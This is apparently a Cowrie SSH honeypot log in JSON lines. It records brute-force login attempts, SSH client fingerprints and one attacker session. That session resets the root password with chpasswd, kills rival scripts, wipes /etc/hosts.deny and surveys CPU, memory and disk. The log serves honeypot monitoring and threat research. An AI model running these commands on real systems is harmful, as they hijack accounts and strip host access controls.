{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55881,"dst_ip":"1.2.3.4","dst_port":22,"session":"3b819b679ce7","protocol":"ssh","message":"New connection: 212.227.235.229:55881 (1.2.3.4:22) [session: 3b819b679ce7]","sensor":"my-vps","timestamp":"2025-08-26T13:30:26.099227Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:30:26.100878Z","src_ip":"212.227.235.229","session":"3b819b679ce7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:30:26.339696Z","src_ip":"212.227.235.229","session":"3b819b679ce7"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T13:30:27.315496Z","src_ip":"212.227.235.229","session":"3b819b679ce7"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:30:28.600996Z","src_ip":"212.227.235.229","session":"3b819b679ce7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:30:34.861055Z","src_ip":"212.227.235.229","session":"0a41a36c4121"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep name | wc -l","message":"CMD: cat /proc/cpuinfo | grep name | wc -l","sensor":"my-vps","timestamp":"2025-08-26T13:30:34.861846Z","src_ip":"212.227.235.229","session":"0a41a36c4121"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99","size":2,"shasum":"3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:30:35.071667Z","src_ip":"212.227.235.229","session":"0a41a36c4121"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:30:35.509938Z","src_ip":"212.227.235.229","session":"0a41a36c4121"}
{"eventid":"cowrie.command.input","input":"echo \"root:89D0cnJRaw4P\"|chpasswd|bash","message":"CMD: echo \"root:89D0cnJRaw4P\"|chpasswd|bash","sensor":"my-vps","timestamp":"2025-08-26T13:30:35.510785Z","src_ip":"212.227.235.229","session":"0a41a36c4121"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/2e529b9333a315a18a3150507d2d2808dcf9bbcdad18200ee55d9b49cb7224be","size":21,"shasum":"2e529b9333a315a18a3150507d2d2808dcf9bbcdad18200ee55d9b49cb7224be","duplicate":false,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/2e529b9333a315a18a3150507d2d2808dcf9bbcdad18200ee55d9b49cb7224be after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:30:35.722452Z","src_ip":"212.227.235.229","session":"0a41a36c4121"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:30:36.199067Z","src_ip":"212.227.235.229","session":"0a41a36c4121"}
{"eventid":"cowrie.command.input","input":"rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;","message":"CMD: rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;","sensor":"my-vps","timestamp":"2025-08-26T13:30:36.199880Z","src_ip":"212.227.235.229","session":"0a41a36c4121"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","shasum":"01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","destfile":"/etc/hosts.deny","message":"Saved redir contents with SHA-256 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b to var/lib/cowrie/downloads/01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","sensor":"my-vps","timestamp":"2025-08-26T13:30:36.414160Z","src_ip":"212.227.235.229","session":"0a41a36c4121"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a","size":0,"shasum":"a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:30:36.415179Z","src_ip":"212.227.235.229","session":"0a41a36c4121"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:30:36.853089Z","src_ip":"212.227.235.229","session":"0a41a36c4121"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'","message":"CMD: cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'","sensor":"my-vps","timestamp":"2025-08-26T13:30:36.853898Z","src_ip":"212.227.235.229","session":"0a41a36c4121"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe","size":35,"shasum":"95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:30:37.064971Z","src_ip":"212.227.235.229","session":"0a41a36c4121"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:30:37.578105Z","src_ip":"212.227.235.229","session":"0a41a36c4121"}
{"eventid":"cowrie.command.input","input":"free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'","message":"CMD: free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'","sensor":"my-vps","timestamp":"2025-08-26T13:30:37.578849Z","src_ip":"212.227.235.229","session":"0a41a36c4121"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c","size":30,"shasum":"ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:30:37.789265Z","src_ip":"212.227.235.229","session":"0a41a36c4121"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:30:38.280732Z","src_ip":"212.227.235.229","session":"0a41a36c4121"}
{"eventid":"cowrie.command.input","input":"ls -lh $(which ls)","message":"CMD: ls -lh $(which ls)","sensor":"my-vps","timestamp":"2025-08-26T13:30:38.281410Z","src_ip":"212.227.235.229","session":"0a41a36c4121"}
{"eventid":"cowrie.command.input","input":"which ls","message":"CMD: which ls","sensor":"my-vps","timestamp":"2025-08-26T13:30:38.281887Z","src_ip":"212.227.235.229","session":"0a41a36c4121"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0","size":55,"shasum":"a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:30:38.494726Z","src_ip":"212.227.235.229","session":"0a41a36c4121"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:30:38.937471Z","src_ip":"212.227.235.229","session":"0a41a36c4121"}
{"eventid":"cowrie.command.input","input":"crontab -l","message":"CMD: crontab -l","sensor":"my-vps","timestamp":"2025-08-26T13:30:38.938323Z","src_ip":"212.227.235.229","session":"0a41a36c4121"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8","size":20,"shasum":"f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:30:39.147944Z","src_ip":"212.227.235.229","session":"0a41a36c4121"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:30:39.666773Z","src_ip":"212.227.235.229","session":"0a41a36c4121"}
{"eventid":"cowrie.command.input","input":"w","message":"CMD: w","sensor":"my-vps","timestamp":"2025-08-26T13:30:39.667491Z","src_ip":"212.227.235.229","session":"0a41a36c4121"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326","size":204,"shasum":"50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:30:39.881249Z","src_ip":"212.227.235.229","session":"0a41a36c4121"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:30:40.320354Z","src_ip":"212.227.235.229","session":"0a41a36c4121"}
{"eventid":"cowrie.command.input","input":"uname -m","message":"CMD: uname -m","sensor":"my-vps","timestamp":"2025-08-26T13:30:40.321020Z","src_ip":"212.227.235.229","session":"0a41a36c4121"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d","size":7,"shasum":"ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:30:40.532100Z","src_ip":"212.227.235.229","session":"0a41a36c4121"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:30:41.050838Z","src_ip":"212.227.235.229","session":"0a41a36c4121"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep model | grep name | wc -l","message":"CMD: cat /proc/cpuinfo | grep model | grep name | wc -l","sensor":"my-vps","timestamp":"2025-08-26T13:30:41.051564Z","src_ip":"212.227.235.229","session":"0a41a36c4121"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420","size":2,"shasum":"64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:30:41.262725Z","src_ip":"212.227.235.229","session":"0a41a36c4121"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:30:41.736499Z","src_ip":"212.227.235.229","session":"0a41a36c4121"}
{"eventid":"cowrie.command.input","input":"top","message":"CMD: top","sensor":"my-vps","timestamp":"2025-08-26T13:30:41.737307Z","src_ip":"212.227.235.229","session":"0a41a36c4121"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39","size":44,"shasum":"28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:30:41.949551Z","src_ip":"212.227.235.229","session":"0a41a36c4121"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:30:42.401254Z","src_ip":"212.227.235.229","session":"0a41a36c4121"}
{"eventid":"cowrie.command.input","input":"uname","message":"CMD: uname","sensor":"my-vps","timestamp":"2025-08-26T13:30:42.401995Z","src_ip":"212.227.235.229","session":"0a41a36c4121"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711","size":6,"shasum":"5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:30:42.612163Z","src_ip":"212.227.235.229","session":"0a41a36c4121"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:30:43.127493Z","src_ip":"212.227.235.229","session":"0a41a36c4121"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-08-26T13:30:43.128275Z","src_ip":"212.227.235.229","session":"0a41a36c4121"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:30:43.340431Z","src_ip":"212.227.235.229","session":"0a41a36c4121"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:30:43.815206Z","src_ip":"212.227.235.229","session":"0a41a36c4121"}
{"eventid":"cowrie.command.input","input":"whoami","message":"CMD: whoami","sensor":"my-vps","timestamp":"2025-08-26T13:30:43.815905Z","src_ip":"212.227.235.229","session":"0a41a36c4121"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","size":5,"shasum":"f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:30:44.025753Z","src_ip":"212.227.235.229","session":"0a41a36c4121"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:30:44.464964Z","src_ip":"212.227.235.229","session":"0a41a36c4121"}
{"eventid":"cowrie.command.input","input":"lscpu | grep Model","message":"CMD: lscpu | grep Model","sensor":"my-vps","timestamp":"2025-08-26T13:30:44.465759Z","src_ip":"212.227.235.229","session":"0a41a36c4121"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851","size":26,"shasum":"afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:30:44.676765Z","src_ip":"212.227.235.229","session":"0a41a36c4121"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:30:45.197623Z","src_ip":"212.227.235.229","session":"0a41a36c4121"}
{"eventid":"cowrie.command.input","input":"df -h | head -n 2 | awk 'FNR == 2 {print $2;}'","message":"CMD: df -h | head -n 2 | awk 'FNR == 2 {print $2;}'","sensor":"my-vps","timestamp":"2025-08-26T13:30:45.198312Z","src_ip":"212.227.235.229","session":"0a41a36c4121"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e","size":10,"shasum":"09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:30:45.411087Z","src_ip":"212.227.235.229","session":"0a41a36c4121"}
{"eventid":"cowrie.session.closed","duration":"22.2","message":"Connection lost after 22.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:30:45.412227Z","src_ip":"212.227.235.229","session":"0a41a36c4121"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":6116,"dst_ip":"1.2.3.4","dst_port":22,"session":"78bf70b730e0","protocol":"ssh","message":"New connection: 212.227.125.160:6116 (1.2.3.4:22) [session: 78bf70b730e0]","sensor":"my-vps","timestamp":"2025-08-26T13:30:54.951003Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OPENSSH_7.9","message":"Remote SSH version: SSH-2.0-OPENSSH_7.9","sensor":"my-vps","timestamp":"2025-08-26T13:30:54.994901Z","src_ip":"212.227.125.160","session":"78bf70b730e0"}
{"eventid":"cowrie.client.kex","hassh":"b21d7cdcc8133dc2b430d1a039fece20","hasshAlgorithms":"diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,blowfish-cbc,cast128-cbc,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc","blowfish-cbc","cast128-cbc","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: b21d7cdcc8133dc2b430d1a039fece20","sensor":"my-vps","timestamp":"2025-08-26T13:30:55.040491Z","src_ip":"212.227.125.160","session":"78bf70b730e0"}
{"eventid":"cowrie.client.kex","hassh":"b21d7cdcc8133dc2b430d1a039fece20","hasshAlgorithms":"diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,blowfish-cbc,cast128-cbc,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc","blowfish-cbc","cast128-cbc","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: b21d7cdcc8133dc2b430d1a039fece20","sensor":"my-vps","timestamp":"2025-08-26T13:30:55.089537Z","src_ip":"212.227.125.160","session":"78bf70b730e0"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:30:55.091093Z","src_ip":"212.227.125.160","session":"78bf70b730e0"}
{"eventid":"cowrie.session.connect","src_ip":"167.99.49.89","src_port":45394,"dst_ip":"1.2.3.4","dst_port":22,"session":"3e3a204ef9b7","protocol":"ssh","message":"New connection: 167.99.49.89:45394 (1.2.3.4:22) [session: 3e3a204ef9b7]","sensor":"my-vps","timestamp":"2025-08-26T13:31:14.684798Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:31:14.686073Z","src_ip":"167.99.49.89","session":"3e3a204ef9b7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:31:14.777047Z","src_ip":"167.99.49.89","session":"3e3a204ef9b7"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"ftpuserpass","message":"login attempt [ftpuser/ftpuserpass] failed","sensor":"my-vps","timestamp":"2025-08-26T13:31:15.180595Z","src_ip":"167.99.49.89","session":"3e3a204ef9b7"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:31:16.274484Z","src_ip":"167.99.49.89","session":"3e3a204ef9b7"}
{"eventid":"cowrie.session.connect","src_ip":"167.99.49.89","src_port":55780,"dst_ip":"1.2.3.4","dst_port":22,"session":"132905380eda","protocol":"ssh","message":"New connection: 167.99.49.89:55780 (1.2.3.4:22) [session: 132905380eda]","sensor":"my-vps","timestamp":"2025-08-26T13:32:19.581036Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:32:19.582021Z","src_ip":"167.99.49.89","session":"132905380eda"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 